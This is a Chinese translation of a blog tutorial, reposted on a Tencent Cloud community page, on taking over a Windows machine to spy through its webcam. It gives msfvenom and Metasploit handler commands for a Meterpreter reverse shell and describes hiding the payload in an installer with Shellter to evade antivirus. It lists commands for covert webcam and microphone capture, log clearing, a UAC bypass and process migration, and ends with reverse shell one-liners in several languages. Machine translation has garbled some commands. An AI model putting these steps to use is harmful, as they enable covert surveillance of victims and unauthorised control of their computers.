前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >反向壳和控制网络摄像头

反向壳和控制网络摄像头

作者头像
C4rpeDime
发布2022-04-26 08:14:50
6460
发布2022-04-26 08:14:50
举报
文章被收录于专栏:黑白安全

如果您的网络摄像头上有一块胶带,您很可能听说黑客或NSA可以远程侦察您。问题是如何?远方的人,你从未见过的人如何能够远程连接你的机器并监视你? 现在可能是你的CCTV,IP摄像头只是暴露在互联网上,攻击者在Shodan等网站上发现了它。你没有更改默认密码和bam,他们在。看着你的一举一动。物联网相机通常就是这种情况。但是,如果我们谈论您内置的网络摄像头,答案

如果您的网络摄像头上有一块胶带,您很可能听说黑客或NSA可以远程侦察您。问题是如何?远方的人,你从未见过的人如何能够远程连接你的机器并监视你? 

现在可能是你的CCTV,IP摄像头只是暴露在互联网上,攻击者在Shodan等网站上发现了它。你没有更改默认密码和bam,他们在。看着你的一举一动。

物联网相机通常就是这种情况。但是,如果我们谈论您内置的网络摄像头,答案更可能是通过Meterpreter有效负载。Meterpreter可以让你访问反向shell,这是我们将在下面介绍的内容。有关Meterpreter的更多信息,请阅读:  

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

你可能在想,为什么反向壳?他们为什么不直接访问我的机器?好吧,因为这种方法很可能会被阻止。我们倾向于限制入站流量比出站流量更多。如果有人想要连接到您的机器,您的机器很可能会阻止它(除非被抬起)。另一方面,如果您尝试连接它们,则您的计算机更有可能让此流量通过。这是因为您的机器是想要建立连接的机器。

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第2张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第2张

msfvenom是一个框架,我们将用它来获得反向shell。它已经预装在Parrot和Kali上。让我们运行以下命令来创建Meterpreter反向TCP shell有效负载。

msfvenom -p windows / meterpreter / reverse_tcp -a x86 -platform windows -f exe LHOST = 192.168.XX LPORT = 4444 -o /home/parrot/name.exe

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第3张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第3张

任务完成。现在让我们上传那个和.......... blocked。这是因为MeterPreter是众所周知的有效载荷,因此大多数的防病毒软件都能够阻止/隔离它。除非你正在处理一个现在仍然存在的不安全的客户。

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第4张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第4张

我们可以使用一个名为Shellter的工具来尝试更改哈希并将反向shell嵌入到另一个文件中。通常,一个人选择将shell嵌入到安装文件中。原因是,大多数安装文件需要以管理员身份运行。正如您稍后将看到的那样,以管理员身份运行漏洞利用程序可以完成所有艰苦工作。

你可以通过简单地运行它的避难所来开始庇护。同样,这是预装Parrot和Kali。

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第5张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第5张

我们现在使用Auto [A]并定位我为此示例创建的可执行文件。

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第6张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第6张

接下来,我们选择反向TCP shell并输入我们机器的IP和端口(攻击者)。完成后,它会将shell嵌入到您选择的exe中,以便您可以将其上传到目标计算机。现在你必须使用一种复杂的方法将它放到目标机器上,但是对于这个例子,我将复制并粘贴。

然而,尽管屏蔽了Meterpreter外壳,AV仍设法检测到它。我现在就打算把它关掉,因为我可以。在现实世界中,攻击者会将AV瘫痪或使其盲目,以便他们可以降低有效载荷。

现在利用是在目标机器上,让我们运行它。 在我们开始之前,让我们在攻击计算机上加载msfconsole(Metasploit)并运行以下命令:

代码语言:javascript
复制
msfconsole 
使用multi / handler 
set payload windows / meterpreter / reverse_tcp 
set LHOST 192.168.XX 
set LPORT 4444 
run
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第7张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第7张

您的会话现在将侦听反向shell脚本中指定的端口和IP。现在让我们让用户运行漏洞利用:

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第8张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第8张

正如您在右侧所看到的,我们有几个失败。这就是我之前提到的需要用户以管理员身份运行它的内容。这样就可以运行和注入所有脚本和DLL。如果用户以管理员身份运行它,您将看到没有失败。像这样:

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第9张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第9张

这是你可以开始玩的时候。攻击者可以在您的计算机上执行多项操作,但如果他们想要使用网络摄像头,他们会执行以下操作:

显示网络摄像头: webcam_list  网络摄像头快照帮助: webcam_snap -h  拍摄照片后不要加载图像:webcam_snap -i 1 -v false  录制音频: record_mic  录制网络摄像头:运行网络摄像头-p / var / www /  停止录制:运行网络摄像头-s

说“茄子!!!

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第10张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第10张

取自机器人先生

这不仅仅是网络摄像头。您可以运行更多命令。例如:清除所有日志(应用程序,系统和安全日志):clearev

这是一个例子,因为黑客不太可能运行它。这是因为做这样的事情会提醒某人。如果你发现一台机器已经完成了日志的擦除,你可以打赌有人已经上过它了。相反,攻击者很可能会删除选择的事件以覆盖他们的踪迹。现在,它将敏锐地发现像时间差距这样的东西。

所有这些都需要管理员权限,而您的用户可能无法使用升级的权限运行它。那很好,因为你可以使用像bypassuac_comhijacker这样的东西。你仍然需要得到一个反向shell,首先它可以在用户级别。

获得shell后,输入后台并按Enter键。这会将当前会话移至后台。然后你可以像这样交换到exploitpassacac_comhijack:

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第11张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第11张

 然后,您可以回到原始会话并运行以下命令:

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第12张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第12张

如果完成,它应该给你一个管理员shell。完成此操作后,您将需要迁移到更稳定的流程。并不是说你会想象你已经将你的反向shell隐藏在Putty exe或安装程序文件中。一旦他们关闭应用程序,您的连接就会丢失,而您可能无法获得另一个连接。这就是您希望快速迁移到持续运行的东西的原因。

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第13张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第13张

首先,让我们查看正在运行的进程。要做到这一点,运行ps

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第14张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第14张

找到稳定的进程后,运行migrate [PID]

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第15张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第15张

然后,这会将您的Meterpreter会话迁移到另一个进程。如果他们关闭被利用的应用程序,您的会话将保留。

正如您所见,Meterpreter非常强大!问题是我不得不手动禁用安全控件。如果客户端是半安全的,它们很可能会阻止您的有效负载。这就是为什么在利用漏洞时经常提供反向shell有效负载的原因。利用可以允许他们上载和运行有效载荷,以便他们可以建立Meterpreter会话。

Meterpreter并不是获得反向shell的唯一方法。可以使用一个名为Netcat的漂亮工具。正如您在下面所看到的,您可能会有更多的运气,因为某些AV供应商并不认为这是一种威胁。

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第16张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第16张

https://www.virustotal.com/gui/file/be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b/detection

可以在usr / share / windows-binaries / nc.exe下的Parrot或Kali上找到Netcat 。将nc.exe上传到目标计算机后,我们可以运行nc.exe [Attacker IP] [Port] -e cmd.exe。这是您最有可能通过脚本自动执行的操作。

反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘  第17张
反向壳和控制网络摄像头 摄像头 shell 安全文摘 安全文摘 第17张

在攻击者机器上我们需要监听连接这可以通过运行来完成: nc -lvp [选择端口]

这将为您提供一个非常简单的反向shell。它只具有用户级权限,但它是一个起点。然后,您可以使用它来进一步利用系统获得管理员权限。您并不总是必须拥有管理员权限才能完成大量工作。如果攻击者设法获得shell,他们可能只是开始窃取或删除文件。简单但有效。下面是一些运行反向shell的例子:

代码语言:javascript
复制
PHP
php -r'$ sock = fsockopen(“192.168.0.10”,1234); exec(“/ bin / sh -i <&3>&3 2>&3”);'
Bash
bash -i>&/ dev / tcp / 192.168.0.1 / 8080 0>&1
Netcat Linux
nc 192.168.0.10 1234 -e / bin / sh
Python
python -c'import socket,subprocess,os; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((“192.168.0.10”,1234)); os.dup2(s.fileno( ),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); P = subprocess.call([“/ bin / sh的”,” -我”]);”
Perlperl -e'使用Socket;  i =“192.168.0.10”;  p = 1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”)); if(connect,S(sockaddr_in( p,inet_aton) ( I)))){开放(STDIN,”>&S”);开放(STDOUT,

文章翻译自https://ctrlaltdel.blog/2019/07/02/reverse-shells-and-controlling-webcams/

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-07-05),如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档